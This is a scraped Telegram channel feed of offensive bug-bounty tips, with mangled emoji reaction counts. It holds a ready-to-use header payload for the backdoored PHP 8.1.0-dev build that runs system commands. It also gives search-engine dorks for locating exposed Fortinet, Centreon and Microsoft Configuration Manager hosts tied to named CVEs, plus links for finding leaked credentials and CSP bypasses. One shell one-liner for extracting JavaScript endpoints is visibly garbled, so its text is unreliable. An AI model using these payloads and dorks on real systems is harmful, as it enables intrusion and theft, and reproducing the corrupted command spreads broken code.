Where is the Reactions? π π π
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯37πΏ7π³6β€4π«‘3π1
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯7β€6π€3π2πΏ1
HUNTER :https://product.name="Microsoft Configuration Manager Remote Control service"
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43468
#Microsoft #infosec #infosecurity #OSINT #Vulnerability
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯7π€3β€2πΏ2π1
This media is not supported in your browser
VIEW IN TELEGRAM
π€·ββοΈπ€¦ββοΈ
π€14πΏ6π2
Network_Security_VAPT_Checklist.pdf
151.6 KB
Network Security VAPT Checklist
π₯4β€3π¨βπ»3π€2πΏ2π1
This media is not supported in your browser
VIEW IN TELEGRAM
A website where you can search for known CSP bypass gadgets to exploit XSS.
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯15β€5π4
Find Leaked Credentials Using Google Chrome dev Tools (The Best Way π)
https://github.com/h4x0r-dz/Leaked-Credentials
https://github.com/h4x0r-dz/Leaked-Credentials
π₯32π1
Your support is my energy! Every reaction inspires me to dig deeper, find exclusive tools, and craft the best resources just for you.βοΈ βοΈ βοΈ
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯44π7β€1
OSCEΒ³ and OSEE Study Guide
Checkout on GitHub
https://github.com/CyberSecurityUP/OSCE3-Complete-Guide
Checkout on GitHub
https://github.com/CyberSecurityUP/OSCE3-Complete-Guide
π₯17π4β€3πΏ2
If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
#bugbounty #bugbountytips #rce #sqli #cybersecurity
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
#bugbounty #bugbountytips #rce #sqli #cybersecurity
π5β€2π₯1
CVE-2024-55573, -53923: SQLi in Centreon, 9.1 rating π₯
The vulnerabilities allow an attacker with high privileges to perform SQL injection into a form for uploading media.
Search at Netlas.io:
π Link: https://nt.ls/NETLB
π Dork: http.favicon.hash_sha256:795c0f8c1ff23b992d6ccb91df5e6488d4c259585da58b2e2f8eeee71147516a OR http.favicon.hash_sha256:c95e0dc8a2cc9a45d29c5381e62e48bde88f661408d4b811e72933fa7da32d4e
Vendor's advisory: https://thewatch.centreon.com/latest-security-bulletins-64/cve-2024-55573-centreon-web-critical-severity-4264
The vulnerabilities allow an attacker with high privileges to perform SQL injection into a form for uploading media.
Search at Netlas.io:
π Link: https://nt.ls/NETLB
π Dork: http.favicon.hash_sha256:795c0f8c1ff23b992d6ccb91df5e6488d4c259585da58b2e2f8eeee71147516a OR http.favicon.hash_sha256:c95e0dc8a2cc9a45d29c5381e62e48bde88f661408d4b811e72933fa7da32d4e
Vendor's advisory: https://thewatch.centreon.com/latest-security-bulletins-64/cve-2024-55573-centreon-web-critical-severity-4264
π₯6π1π«‘1
Fortinet FortiOS Authentication Bypass CVE-2024-55591
Query:
HUNTER:/product.name="Fortinet Firewall"
FOFA: product="FORTINET-Firewall"
SHODAN: instances running fortigate:
http.favicon.hash:945408572
ZoomEye Dork: app="Fortinet Firewall"
#BugBounty #CyberSecurity
Query:
HUNTER:/product.name="Fortinet Firewall"
FOFA: product="FORTINET-Firewall"
SHODAN: instances running fortigate:
http.favicon.hash:945408572
ZoomEye Dork: app="Fortinet Firewall"
#BugBounty #CyberSecurity
π9β€4π₯1
Extract all endpoints from a JS File and take your bug π
β Method one
β Method two
#infosec #cybersec #bugbountytips
β Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
β Method two
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt
#infosec #cybersec #bugbountytips
π11π₯3β€2
πConfig Repo- https://github.com/shellvik/shvbox/
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯4π2
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯4